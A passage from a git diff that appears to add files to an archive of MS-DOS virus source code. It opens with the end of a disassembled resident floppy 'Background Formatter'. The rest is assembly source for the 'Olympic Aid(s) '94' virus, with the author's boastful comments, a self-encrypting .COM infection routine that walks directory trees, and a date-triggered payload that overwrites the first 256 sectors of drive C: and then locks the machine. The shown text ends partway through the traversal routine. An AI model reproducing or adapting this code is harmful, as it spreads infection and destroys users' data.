ds:[21Fh],200h + mov word ptr ds:[21Dh],0 + retn +sub_49 endp + + +; +; SUBROUTINE +; + +sub_51 proc near + mov al,data_65 + dec al + cbw ; Convrt byte to word + mov bl,4 + div bl ; al, ah rem = ax/reg + mov cl,ah + cbw ; Convrt byte to word + mov di,ax + rol cl,1 ; Rotate + add cl,data_64 + mov al,80h + ror al,cl ; Rotate + or byte ptr ds:[139h][di],al + retn +sub_51 endp + + +; +; SUBROUTINE +; + +sub_52 proc near + mov data_65,0 + mov data_64,0 + mov data_66,1 + mov data_94,0 + mov data_63,0 + mov data_59,0F6h + retn +sub_52 endp + + +; +; SUBROUTINE +; + +sub_53 proc near + xor al,al ; Zero register + mov cx,200h + mov di,offset data_214 + cld ; Clear direction + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] + retn +sub_53 endp + + mov di,data_100 + mov ax,0D1BAh + cld ; Clear direction + stosw ; Store ax to es:[di] + stosw ; Store ax to es:[di] + mov ax,data_54 + stosw ; Store ax to es:[di] + mov data_100,di + inc data_95 + inc data_99 + retn + +; +; SUBROUTINE +; + +sub_54 proc near + mov word ptr data_98,0 + mov si,offset 139h + cld ; Clear direction +loc_230: + lodsb ; String [si] to al + mov cl,4 +loc_231: + mov ah,al + and ah,3 + cmp ah,3 + je loc_232 ; Jump if equal + cmp ah,0 + je loc_233 ; Jump if equal + mov bl,data_56 + call sub_57 + jmp short loc_233 + db 90h +loc_232: + mov bl,data_56 + shl bl,1 ; Shift w/zeros fill + call sub_57 +loc_233: + dec cl + jz loc_234 ; Jump if zero + shr al,1 ; Shift w/zeros fill + shr al,1 ; Shift w/zeros fill + jmp short loc_231 +loc_234: + cmp si,14Dh + jl loc_230 ; Jump if < + retn +sub_54 endp + + +; +; SUBROUTINE +; + +sub_55 proc near + push cx + mov al,byte ptr ds:[2423h] + cbw ; Convrt byte to word + mov bx,ax + mov al,data_53 + cbw ; Convrt byte to word + add ax,word ptr ds:[223h] + xor dx,dx ; Zero register + div bx ; ax,dx rem=dx:ax/reg + call sub_59 + xor dx,dx ; Zero register + mov bx,2 + div bx ; ax,dx rem=dx:ax/reg + call sub_58 + mov bx,3 + mul bx ; dx:ax = reg * ax + add ax,3 + add ax,cx + pop cx + 
retn +sub_55 endp + + +; +; SUBROUTINE +; + +sub_56 proc near + mov ah,data_95 + inc ah + call sub_47 + mov data_190,ax + retn +sub_56 endp + + +; +; SUBROUTINE +; + +sub_57 proc near + xor bh,bh ; Zero register + cmp data_56,9 + jne loc_235 ; Jump if not equal + clc ; Clear carry flag + rcr bx,1 ; Rotate thru carry + adc bx,0 +loc_235: + add word ptr data_98,bx + retn +sub_57 endp + + +; +; SUBROUTINE +; + +sub_58 proc near + cmp dx,0 + je loc_236 ; Jump if equal + mov cx,1 + retn +loc_236: + mov cx,dx + retn +sub_58 endp + + +; +; SUBROUTINE +; + +sub_59 proc near + test al,1 + jz loc_237 ; Jump if zero + mov word ptr ds:[229h],2 + retn +loc_237: + mov word ptr ds:[229h],0 + retn +sub_59 endp + + +; +; SUBROUTINE +; + +sub_60 proc near + mov di,offset 139h + xor al,al ; Zero register + mov cx,14h + cld ; Clear direction + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] + retn +sub_60 endp + + +; +; SUBROUTINE +; + +sub_61 proc near + mov si,data_31 + mov bx,offset data_41 + mov al,[bx+si] + mov byte ptr ds:[2423h],al + mov bx,offset data_47 + mov al,[bx+si] + mov byte ptr ds:[242Bh],al + mov bx,offset data_39 + mov al,[bx+si] + mov data_71,al + mov bx,offset data_43 + mov al,[bx+si] + mov data_55,al + mov bx,offset data_44 + mov al,[bx+si] + mov data_56,al + and ax,0FFh + mov word ptr ds:[242Eh],ax + mov bx,offset data_45 + mov al,[bx+si] + mov data_57,al + mov bx,offset data_46 + mov al,[bx+si] + mov data_58,al + mov bx,offset data_52 + mov al,[bx+si] + mov data_53,al + shl si,1 ; Shift w/zeros fill + mov bx,offset data_48 + mov ax,[bx+si] + mov word ptr ds:[2427h],ax + mov bx,offset data_40 + mov ax,[bx+si] + mov data_61,ax + mov bx,offset data_37 + mov ax,[bx+si] + mov word ptr data_60,ax + mov bx,69h + mov ax,[bx+si] + mov word ptr ds:[2429h],ax + mov bx,offset data_50 + mov ax,[bx+si] + mov word ptr ds:[242Ch],ax + mov bx,offset data_51 + mov ax,[bx+si] + mov data_54,ax + mov ah,4 + int 1Ah ; Real time clock ah=func 04h + ; get date cx=year, dx=mon/day + 
mov word ptr ds:[243Fh],dx + cmp data_31,0 + jne loc_238 ; Jump if not equal + mov word ptr ds:[216h],143h + retn +loc_238: + mov word ptr ds:[216h],14Dh + retn +sub_61 endp + + jmp short loc_239 + nop + inc dx + inc si + dec di + push dx + dec bp + inc cx + push sp + and [bx+si],al + add al,[bx+si] + add [bx+si],ax + add al,[bx+si] + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add al,[bx+si] + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + sub [bx+si],ax + add [bx+si],al + add [bp+4Fh],cl + db ' NAME FAT12 ', 0Dh, 0Ah, ' ' + db 'Non-System Disk ...', 0Dh, 0Ah, ' ' + db 'Replace And Press Any Key When R' + db 'eady...', 0Dh, 0Ah, 0 +loc_239: + xor ax,ax ; Zero register + cli ; Disable interrupts + mov ss,ax + mov sp,7C00h + sti ; Enable interrupts + push cs + pop ds + mov si,data_234e + cld ; Clear direction +loc_240: + lodsb ; String [si] to al + test al,al + jz loc_241 ; Jump if zero + mov ah,0Eh + xor bx,bx ; Zero register + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_240 +loc_241: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + int 19h ; Bootstrap loader + db 347 dup (0) + db 55h,0AAh + +; +; SUBROUTINE +; + +sub_62 proc near + mov byte ptr ds:[22Fh],1 + mov ds,data_25 + mov al,0FFh + mov ds:dsk_motor_tmr_,al + mov al,ds:dsk_motor_stat_ + and al,0Fh + push cs + pop ds + cmp al,0 + je loc_242 ; Jump if equal + retn +loc_242: + mov cl,data_29 + mov al,10h + shl al,cl ; Shift w/zeros fill + mov ah,al + or al,cl + or al,0Ch + mov dx,3F2h + out dx,al ; port 3F2h, dsk0 contrl output + mov cl,4 + rol ah,cl ; Rotate + mov ds,data_25 + mov ds:dsk_motor_stat_,ah + push cs + pop ds + mov byte ptr ds:[22Dh],2 + call sub_7 + retn +sub_62 endp + + +; +; SUBROUTINE +; + +sub_63 proc near + pop ax + mov data_86,ax + call sub_62 + call sub_67 + jmp short loc_243 + db 90h + +; External Entry into Subroutine + +sub_64: + pop ax + mov 
data_86,ax + mov data_63,0 + call sub_62 + call sub_66 +loc_243: + call sub_79 + call sub_68 + jc loc_244 ; Jump if carry Set + jmp data_86 +loc_244: + clc ; Clear carry flag + jmp loc_123 +sub_63 endp + + +; +; SUBROUTINE +; + +sub_65 proc near + pop ax + mov data_88,ax + call sub_64 + test data_73,0C0h + jz loc_245 ; Jump if zero + call sub_64 + test data_73,0C0h + jz loc_245 ; Jump if zero + jmp loc_123 +loc_245: + mov al,data_65 + cmp data_31,0 + jne loc_246 ; Jump if not equal + shl al,1 ; Shift w/zeros fill +loc_246: + mov data_63,al + call sub_63 + jmp data_88 + +; External Entry into Subroutine + +sub_66: + mov ah,7 + call sub_71 + mov ah,data_29 + call sub_71 + retn +sub_65 endp + + +; +; SUBROUTINE +; + +sub_67 proc near + mov ah,0Fh + call sub_71 + mov ah,data_29 + call sub_71 + mov ah,data_63 + call sub_71 + retn +sub_67 endp + + +; +; SUBROUTINE +; + +sub_68 proc near + mov ah,8 + call sub_71 + call sub_70 + mov data_73,al + call sub_70 + mov data_72,al + retn +sub_68 endp + + +; +; SUBROUTINE +; + +sub_69 proc near + call sub_70 + mov data_73,al + call sub_70 + mov data_74,al + call sub_70 + mov data_75,al + call sub_70 + mov data_77,al + call sub_70 + mov data_78,al + call sub_70 + mov data_79,al + call sub_70 + mov data_80,al + retn +sub_69 endp + + +; +; SUBROUTINE +; + +sub_70 proc near + mov dx,3F4h + xor cx,cx ; Zero register + +locloop_247: + in al,dx ; port 3F4h, dsk0 cntrlr status + and al,0C0h + cmp al,0C0h + je loc_248 ; Jump if equal + loop locloop_247 ; Loop if cx > 0 + + pop ax + stc ; Set carry flag + retn +loc_248: + inc dx + in al,dx ; port 3F5h, dsk0 controlr data + clc ; Clear carry flag + retn +sub_70 endp + + +; +; SUBROUTINE +; + +sub_71 proc near + mov dx,3F4h + xor cx,cx ; Zero register + +locloop_249: + in al,dx ; port 3F4h, dsk0 cntrlr status + and al,0C0h + cmp al,80h + je loc_250 ; Jump if equal + loop locloop_249 ; Loop if cx > 0 + + pop ax + stc ; Set carry flag + retn +loc_250: + mov al,ah + inc dx + out dx,al ; port 
3F5h, dsk0 controlr data + clc ; Clear carry flag + retn +sub_71 endp + + +; +; SUBROUTINE +; + +sub_72 proc near + mov dx,3F7h + mov al,data_71 + out dx,al ; port 3F7h ??I/O Non-standard + retn +sub_72 endp + + +; +; SUBROUTINE +; + +sub_73 proc near + mov al,2 + out 0Ch,al ; port 0Ch, DMA-1 clr byte ptr + jmp short $+2 ; delay for I/O + mov al,ah + out 0Bh,al ; port 0Bh, DMA-1 mode reg + mov bx,data_68 + push cs + pop ax + mov cl,4 + rol ax,cl ; Rotate + mov ch,al + and al,0F0h + add ax,bx + jnc loc_251 ; Jump if carry=0 + inc ch +loc_251: + out 4,al ; port 4, DMA-1 bas&add ch 2 + jmp short $+2 ; delay for I/O + mov al,ah + out 4,al ; port 4, DMA-1 bas&add ch 2 + jmp short $+2 ; delay for I/O + mov al,ch + and al,0Fh + out 81h,al ; port 81h, DMA page reg ch 2 + mov ax,data_67 + out 5,al ; port 5, DMA-1 bas&cnt ch 2 + jmp short $+2 ; delay for I/O + mov al,ah + out 5,al ; port 5, DMA-1 bas&cnt ch 2 + jmp short $+2 ; delay for I/O + mov al,2 + out 0Ah,al ; port 0Ah, DMA-1 mask reg bit + retn +sub_73 endp + + +; +; SUBROUTINE +; + +sub_74 proc near + pop ax + mov data_86,ax + mov data_68,28E9h + mov data_67,1FFh + mov data_69,46h ; 'F' + mov data_70,0E6h + call sub_62 + call sub_72 + mov ah,data_69 + call sub_73 + call sub_76 + jc loc_252 ; Jump if carry Set + call sub_79 + call sub_69 + jc loc_252 ; Jump if carry Set + jmp data_86 +loc_252: + clc ; Clear carry flag + call sub_7 + jmp loc_123 +sub_74 endp + + +; +; SUBROUTINE +; + +sub_75 proc near + pop ax + mov data_86,ax + call sub_62 + call sub_72 + mov ah,data_69 + call sub_73 + call data_85 + jc loc_253 ; Jump if carry Set + call sub_79 + call sub_69 + jc loc_253 ; Jump if carry Set + jmp data_86 +loc_253: + clc ; Clear carry flag + call sub_7 + jmp loc_123 +sub_75 endp + + +; +; SUBROUTINE +; + +sub_76 proc near + mov ah,data_70 + call sub_71 + mov ah,data_29 + cmp data_64,0 + je loc_254 ; Jump if equal + or ah,4 +loc_254: + call sub_71 + mov ah,data_65 + call sub_71 + mov ah,data_64 + call sub_71 + mov 
ah,data_66 + call sub_71 + mov ah,2 + call sub_71 + mov ah,data_56 + call sub_71 + mov ah,data_57 + call sub_71 + mov ah,0FFh + call sub_71 + retn +sub_76 endp + + mov ah,4Dh ; 'M' + call sub_71 + mov ah,data_29 + cmp data_64,0 + je loc_255 ; Jump if equal + or ah,4 +loc_255: + call sub_71 + mov ah,2 + call sub_71 + mov ah,data_56 + call sub_71 + mov ah,data_58 + call sub_71 + mov ah,data_59 + call sub_71 + retn + +; +; SUBROUTINE +; + +sub_77 proc near + mov ah,4 + call sub_71 + mov ah,data_29 + call sub_71 + call sub_70 + mov data_76,al + retn +sub_77 endp + + +; +; SUBROUTINE +; + +sub_78 proc near + pop ax + mov data_87,ax + call sub_48 + mov ax,data_61 + mov data_67,ax + mov data_68,14Dh + mov data_69,4Ah ; 'J' + mov data_85,2837h + call sub_75 + test data_73,0C0h + jnz loc_256 ; Jump if not zero + jmp data_87 +loc_256: + test data_74,2 + jz loc_257 ; Jump if zero + jmp loc_86 +loc_257: + cmp data_94,2 + jne loc_258 ; Jump if not equal + mov data_94,0 + jmp loc_93 +loc_258: + inc data_94 + call sub_65 + test data_73,0C0h + jnz loc_259 ; Jump if not zero + jmp data_82 +loc_259: + jmp loc_123 +sub_78 endp + + +; +; SUBROUTINE +; + +sub_79 proc near + mov cx,18h + +locloop_260: + call sub_7 + cmp byte ptr ds:[22Fh],0 + jne loc_261 ; Jump if not equal + retn +loc_261: + loop locloop_260 ; Loop if cx > 0 + + pop ax + jmp loc_123 +sub_79 endp + +data_214 db 0 +data_215 dw 0 + db 8 dup (0) +data_217 dw 0 + db 26 dup (0) +data_218 dw 0 +data_219 dw 0 + db 469 dup (0) +data_220 db 0 + db 154 dup (0) +data_221 db 0Dh, 0Ah, ' Mem Resident Format A' + db 'lready Installed', 0Dh, 0Ah, 'Al' + db 't + Left Shift + Right Shift Wil' + db 'l Activate', 0Dh, 0Ah, '$' +data_222 db 0Dh, 0Ah, 'Background Formatter I' + db 's Installed', 0Dh, 0Ah, 'Alt + L' + db 'eft Shift + Right Shift Will Act' + db 'ivate', 0Dh, 0Ah, '$' +data_223 db 0Dh, 0Ah, 'No Diskette Drive Conn' + db 'ect', 0Dh, 0Ah, 'Program Termina' + db 'ted !', 0Dh, 0Ah, '$' + db 'There Are ' +data_224 db 0 + db ' 
Diskette Drives Connected' + db 0 +data_225 db 0 + db 20h,0C4h + db 14 dup (0C4h) +data_227 db ' ', 0 + db 'Is This Configuration Correct ? ' + db '[Y]', 0 + db 'How Many Diskette Drives ( Not I' + db 'nclude Fixed Disk ) ?', 0 + db 'DRIVE ', 0 + db ' ( 0 - 360K, 1 - 1.2M, 2 - 720K,' + db ' 3 - 1.44M ) ?', 0 +loc_262: + push cs + pop ds + push cs + pop es + call sub_86 + mov word ptr ds:[1E2h],cs + mov word ptr ds:[1E4h],cs + mov word ptr ds:[1DAh],cs + mov word ptr ds:[1E0h],cs + mov word ptr data_24,0EBFEh + cli ; Disable interrupts + mov word ptr ds:[1E6h],ss + mov word ptr ds:[1E8h],sp + push cs + pop ss + mov sp,2B84h + mov ax,202h + push ax + push cs + mov ax,data_81 + push ax + mov word ptr ds:[1DCh],sp + mov ss,word ptr ds:[1E6h] + mov sp,word ptr ds:[1E8h] + sti ; Enable interrupts + call sub_80 + call sub_23 + call sub_88 + call sub_24 + mov al,0Eh + mov si,19Dh + mov dx,12CCh + call sub_87 + mov al,13h + mov si,1A1h + mov dx,12E6h + call sub_87 + mov al,9 + mov si,199h + mov dx,127Ah + call sub_87 + mov al,8 + mov si,195h + mov dx,11E0h + call sub_87 + mov dx,offset data_222 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov al,0 + mov dx,2B84h + mov cl,4 + shr dx,cl ; Shift w/zeros fill + add dx,11h + mov ah,31h ; '1' + int 21h ; DOS Services ah=function 31h + ; terminate & stay resident + ; al=return code,dx=paragraphs + +; +; SUBROUTINE +; + +sub_80 proc near + push es + mov es,cs:data_25 + mov dx,es:video_port_ + add dx,6 + mov cs:data_90,dx + pop es + int 11h ; Put equipment bits in ax + mov bh,al + and bh,30h ; '0' + mov data_91,0B800h + cmp bh,30h ; '0' + jne loc_263 ; Jump if not equal + mov data_91,0B000h +loc_263: + mov bh,al + and bh,1 + and ax,0C0h + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + add ah,bh + cmp ah,0 + jne loc_264 ; Jump if not equal + mov dx,offset data_223 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + jmp loc_277 
+loc_264: + mov al,ah + cmp al,3 + jl loc_265 ; Jump if < + mov al,2 +loc_265: + mov data_28,al + or al,30h ; '0' + mov data_224,al + call sub_81 + retn + +; External Entry into Subroutine + +sub_81: + push ax + push es + push di + mov bx,0Dh + mov dx,0 +loc_266: + mov si,dx + push ax + push bx + push dx + mov ah,8 + int 13h ; Disk dl=drive a ah=func 08h + ; get drive parameters, bl=type + ; cx=cylinders, dh=max heads + ; es:di= ptr to drive table + jc loc_267 ; Jump if carry Set + mov al,bl + dec al + pop dx + pop bx + mov [bx+si],al + pop ax + dec ah + jz loc_268 ; Jump if zero + inc dx + jmp short loc_266 +loc_267: + add sp,6 +loc_268: + pop di + pop es + pop ax + retn + +; External Entry into Subroutine + +sub_82: + mov al,41h ; 'A' + mov dx,0C1Dh + mov di,0 + call sub_85 + retn + +; External Entry into Subroutine + +sub_83: + call sub_82 + call sub_84 + retn + +; External Entry into Subroutine + +sub_84: + mov al,42h ; 'B' + mov dx,0E1Dh + mov di,1 + call sub_85 + retn + +; External Entry into Subroutine + +sub_85: + mov data_225,al + mov si,2C8Bh + call sub_14 + mov al,[di+0Dh] + nop ;*ASM fixup - displacement + cbw ; Convrt byte to word + add ax,ax + mov si,ax + mov bx,offset data_32 + mov si,[bx+si] + call sub_15 + retn + +; External Entry into Subroutine + +sub_86: + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + ;* undocumented function + mov data_231,bx + mov ax,300Eh + mov data_232,ax + xor ax,ax ; Zero register +loc_269: + mov ds,ax + xor si,si ; Zero register + cld ; Clear direction + lodsb ; String [si] to al + cmp al,4Dh ; 'M' + je loc_271 ; Jump if equal +loc_270: + push ds + pop ax + inc ax + jmp short loc_269 +loc_271: + push ds + mov si,data_3e + lodsw ; String [si] to ax + pop bx + add bx,ax + inc bx + jc loc_270 ; Jump if carry Set + cmp cs:data_231,bx + jb loc_270 ; Jump if below + push ds + mov ds,bx + cmp byte ptr ds:data_17e,4Dh ; 'M' + nop ;*ASM fixup - sign extn byte + je loc_272 ; Jump if 
equal + pop ds + jmp short loc_270 +loc_272: + mov di,cs:data_232 + push cs + pop es + mov bx,ds + pop ds + mov ax,ds + stosw ; Store ax to es:[di] + mov ax,bx + stosw ; Store ax to es:[di] + mov ds,bx +loc_273: + push ds + mov si,data_3e + lodsw ; String [si] to ax + pop bx + add bx,ax + inc bx + mov ax,bx + stosw ; Store ax to es:[di] + mov ds,bx + xor si,si ; Zero register + lodsb ; String [si] to al + cmp al,5Ah ; 'Z' + jne loc_273 ; Jump if not equal + xor ax,ax ; Zero register + stosw ; Store ax to es:[di] + push cs + pop ds + mov si,di + sub si,6 + lodsw ; String [si] to ax + mov data_26,ax + lodsw ; String [si] to ax + mov data_27,ax + mov si,offset data_233 +loc_274: + mov ax,[si] + cmp ax,0 + je loc_275 ; Jump if equal + mov es,ax + mov ax,es:data_2e + add ax,10h + mov es,ax + mov di,data_18e + cmp word ptr es:[di],0EBFEh + je loc_276 ; Jump if equal + add si,2 + jmp short loc_274 +loc_275: + push cs + pop es + retn +loc_276: + mov dx,offset data_221 ; ('') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_277: + call sub_11 + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +sub_80 endp + + +; +; SUBROUTINE +; + +sub_87 proc near + push es + push ax + push si + push dx + mov ah,35h ; '5' + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + pop dx + pop si + pop ax + mov [si],bx + mov [si+2],es + mov ah,25h ; '%' + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + retn +sub_87 endp + + +; +; SUBROUTINE +; + +sub_88 proc near +loc_278: + call sub_19 + mov dh,8 + mov dl,17h + mov si,2C65h + call sub_14 + mov al,data_28 + cbw ; Convrt byte to word + dec al + mov di,ax + add di,di + mov bx,offset data_229 + call word ptr [bx+di] ;* + mov dh,12h + mov dl,18h + mov si,2C9Eh + call sub_14 + call sub_13 +loc_279: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + je loc_ret_282 ; 
Jump if equal
+ cmp al,1Bh
+ jne loc_280 ; Jump if not equal
+ jmp short loc_ret_282
+ db 90h
+loc_280:
+ and al,0DFh
+ cmp al,59h ; 'Y'
+ je loc_ret_282 ; Jump if equal
+ cmp al,4Eh ; 'N'
+ je loc_281 ; Jump if equal
+ call sub_11
+ jmp short loc_279
+loc_281:
+ call sub_89
+
+loc_ret_282:
+ retn
+sub_88 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_89 proc near
+ call sub_19
+ mov dh,12h
+ mov dl,0Eh
+ mov si,2CC2h
+ call sub_14
+ call sub_13
+loc_283:
+ mov ah,0
+ int 16h ; Keyboard i/o ah=function 00h
+ ; get keybd char in al, ah=scan
+ cmp al,31h ; '1'
+ jge loc_285 ; Jump if > or =
+loc_284:
+ call sub_11
+ jmp short loc_283
+loc_285:
+ cmp al,32h ; '2'
+ jg loc_284 ; Jump if >
+ mov data_224,al
+ and al,0Fh
+ mov data_28,al
+ cbw ; Convrt byte to word
+ push ax
+ mov dh,8
+ mov dl,17h
+ mov si,2C65h
+ call sub_14
+ mov al,41h ; 'A'
+ mov byte ptr data_227+62h,al ; ('')
+ xor di,di ; Zero register
+ mov bx,0Dh
+loc_286:
+ mov dh,12h
+ mov dl,0Eh
+ mov si,2CF8h
+ call sub_14
+ call sub_13
+ mov al,33h ; '3'
+ mov data_102,al
+ mov data_89,2FCDh
+ call sub_16
+ mov [bx+di],al
+ push bx
+ push di
+ shl di,1 ; Shift w/zeros fill
+ mov bx,offset data_229
+ call word ptr [bx+di] ;*
+ pop di
+ pop bx
+ inc di
+ pop ax
+ cmp di,ax
+ je loc_287 ; Jump if equal
+ push ax
+ inc byte ptr data_227+62h ; ('')
+ jmp short loc_286
+loc_287:
+ pop ax
+ jmp loc_278
+sub_89 endp
+
+data_229 dw offset sub_82
+data_230 dw offset sub_83
+data_231 dw 0
+data_232 dw 0
+data_233 dw 100 dup (0)
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.aid(s).asm b/MSDOS/Virus.MSDOS.Unknown.aid(s).asm
new file mode 100644
index 00000000..a9f4f438
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.aid(s).asm
@@ -0,0 +1,542 @@
+ ; VirusName: Olympic Aid(s) '94
+ ; Origin : Norway
+ ; Author : The Penetrator
+ ; Date : 1/01/1994
+ ;
+ ; Hopefully the Olympics at Lillehammer is over when you read this
+ ; shit.This virus was made only for creating fear, and some publicity.
+ ;
+ ; Anyway this is a new selfencrypting non-overwriting *.COM infector...
+ ; And YES, it may (and WILL) harm you. It's a 10% chanse for a Major
+ ; ScrewUp (NO ScrewUps before February the 12th. Just to give it some
+ ; time to spread)
+ ;
+ ; And I have to send some fuckings to Norman Data Defence Systems in
+ ; Drammen, Norway. They is fucking up the BBS scene here in Norway
+ ; right now!
+ ; // The Penetrator/NORWAY
+ ; -----------
+ ; (Now follows Immortal Riot comments!);
+ ; This is the virus, WE got accused for writing, how silly! Anyhow
+ ; I picked this one up from a dude in Norway, and he told me that
+ ; I could include it in our magazine, or whatever.
+ ;
+ ; It's nothing fancy or something, but hey! it surely was easy
+ ; publicity!, too bad that the papers accused US for doing it..
+ ; We didn't, this is just a contribution from our friends in Norway,
+ ; that we picked up AFTER we'd got the silly F-bull 2.11, and had to
+ ; investigate the situation.
+ ;
+ ; I've in this version recieved another ansi-screen to include, dunno
+ ; about the last one.. Anyhow, this is as The Penetrate said a non-ow
+ ; .COM infector. It searches the whole directory tree of files to
+ ; infect, thus making it slow when its spreads trough the drive. It's
+ ; also highly destructive (NM.NUKE.VCL.256.TRASH). Some code resembles
+ ; of VCL based code, but if you want to read more about it, just read
+ ; our article about VCL.Olympic also included in Insane Reality issue4.
+ ;
+ ; HAHA!, Norway, Sweden got 24 gold-medals from the Olympic.Games
+ ; (If the ice-hockey counts!!), just as I told you! Haha!, AND give
+ ; my best to Beate (can't you give girls REAL-names in Norway??).
+ ;
+ ; Thanks to All Norweigian contributors // The Unforgiven/Immortal Riot.
+ ;
+ ; -----------
+ ; OLYMPIC AID(S) '94
+ ; -----------
+
+code segment byte public
+ assume cs:code,ds:code,es:code,ss:code
+ org 0100h
+
+
+ ; -- JUST FOR FIRST TIME INSTALLING -----
+
+main proc near
+ db 0E9h,00h,00h ; Near Jump
+
+ ; -- S T A R T O F V I R I I -----
+
+start: call find_offset ; Like a PUSH IP
+find_offset: pop bp ; We love POP'ing
+ push bp ; and PUSH'ing
+ pop bp ; bp's
+ sub bp,offset find_offset ; Adjust for length of host
+
+GeneticChange: MOV byte ptr [BP+GeneticChange+4],001h ;
+
+ call encrypt_decrypt ; Decrypt the virus
+
+start_of_code label near
+
+ lea si,[bp + buffer] ; SI points to original start
+ mov di,0100h ; Push 0100h on to stack for
+ push di ; return to main program
+ movsw ; Copy the first two bytes
+ movsb ; Copy the third byte
+
+ mov di,bp ; DI points to start of virus
+
+ mov bp,sp ; BP points to stack
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address on stack
+
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer on stack
+ int 021h
+
+
+ mov cx,0005h ; Do X infections
+search_loop: push cx ; Save CX
+ add byte ptr [DI+GeneticChange+4],001h ; Some BullShit!!!
+ call search_files ; Find and infect a file
+ pop cx ; Restore CX
+ loop search_loop ; Repeat until CX is 0
+
+
+ ; -- CHECKING DATE/TIME FOR OLYMPIC START --
+
+CheckDate: mov ah,2ah
+ int 21h ; DOS Services ah=function 2Ah
+ ; get date, cx=year, dh=month
+ ; dl=day, al=day-of-week 0=SUN
+
+ cmp DH,2h ; February
+ jB NoFuckUp
+ cmp DL,12 ; The Olympics is starting
+ jB NoFuckUp ; the 12 th.
+
+ mov ah,2Ch
+ int 21h ; DOS Services ah=function 2Ch
+ ; get time, cx=hrs/min, dx=sec
+ cmp DL,10 ; 10 % chanse for...
+ jA NoFuckUp
+
+Yeah: jmp OL1994 ; ScrewUp...
+
+
+ ; -- RETURN NICELY AND QUIET TO INFECTED FILE --
+
+NoFuckUp: pop dx ; DX holds original DTA address
+ mov ah,01Ah ; DOS set DTA function
+ int 021h
+
+ mov sp,bp ; Deallocate local buffer
+
+ xor ax,ax ;
+ mov bx,ax ;
+ mov cx,ax ;
+ mov dx,ax ; Empty out the registers
+ mov si,ax ;
+ mov di,ax ;
+ mov bp,ax ;
+
+ ret ; Return to original program
+main endp
+
+
+; -- LET'S LOOK AT THE OLYMPIC RINGS ----
+
+OL1994: mov ah,0Fh ; BIOS get video mode function
+ int 010h
+ xor ah,ah ; BIOS set video mode function
+ int 010h ; (Clear Screen)
+
+ lea si,[di + AnsiData] ; SI points to data
+ mov cx,AnsiEnd-AnsiData ; Data Length
+
+ JCXZ Done
+
+ xor di,di
+ mov ax,0b800h
+ mov es,ax
+
+ MOV DX,DI ;Save X coordinate for later.
+ XOR AX,AX ;Set Current attributes.
+ CLD
+
+LOOPA: LODSB ;Get next character.
+ CMP AL,32 ;If a control character, jump.
+ JC ForeGround
+ STOSW ;Save letter on screen.
+Next: LOOP LOOPA
+ JMP Short Done
+
+ForeGround:
+ CMP AL,16 ;If less than 16, then change the
+ JNC BackGround ;foreground color. Otherwise jump.
+ AND AH,0F0H ;Strip off old foreground.
+ OR AH,AL
+ JMP Next
+
+BackGround:
+ CMP AL,24 ;If less than 24, then change the
+ JZ NextLine ;background color. If exactly 24,
+ JNC FlashBitToggle ;then jump down to next line.
+ SUB AL,16 ;Otherwise jump to multiple output
+ ADD AL,AL ;routines.
+ ADD AL,AL
+ ADD AL,AL
+ ADD AL,AL
+ AND AH,8FH ;Strip off old background.
+ OR AH,AL
+ JMP Next
+
+NextLine:
+ ADD DX,160 ;If equal to 24,
+ MOV DI,DX ;then jump down to
+ JMP Next ;the next line.
+
+FlashBitToggle:
+ CMP AL,27 ;Does user want to toggle the blink
+ JC MultiOutput ;attribute?
+ JNZ Next
+ XOR AH,128 ;Done.
+ JMP Next
+
+MultiOutput:
+ CMP AL,25 ;Set Z flag if multi-space output.
+ MOV BX,CX ;Save main counter.
+ LODSB ;Get count of number of times
+ MOV CL,AL ;to display character.
+ MOV AL,32
+ JZ StartOutput ;Jump here if displaying spaces.
+ LODSB ;Otherwise get character to use.
+ DEC BX ;Adjust main counter.
+
+StartOutput:
+ XOR CH,CH
+ INC CX
+ REP STOSW
+ MOV CX,BX
+ DEC CX ;Adjust main counter.
+ LOOPNZ LOOPA ;Loop if anything else to do...
+Done:
+
+
+ ; -- HAAKON & KRISTIN SCREWS UP --------
+
+
+TrashHD: CLI ; Disable interrupts
+ mov ax,0002h ; DRIVE C:
+ mov cx,100h ; Sectors (100hex=256DEC!)
+ XOR DX,DX ; Clear DX (start with sector 0)
+ int 026h ; DOS absolute write interrupt
+EndlessLoop: JMP EndlessLoop ; Boring...ehh???
+
+
+ ; -- FIND FILES -------
+
+search_files proc near
+ push bp ; Save BP
+ mov bp,sp ; BP points to local buffer
+ sub sp,64 ; Allocate 64 bytes on stack
+
+ mov ah,047h ; DOS get current dir function
+ xor dl,dl ; DL holds drive # (current)
+ lea si,[bp - 64] ; SI points to 64-byte buffer
+ int 021h
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[di + root] ; DX points to root directory
+ int 021h
+
+ call traverse ; Start the traversal
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[bp - 64] ; DX points to old directory
+ int 021h
+
+ mov sp,bp ; Restore old stack pointer
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+root db "\",0 ; Root directory
+search_files endp
+
+traverse proc near
+ push bp ; Save BP
+
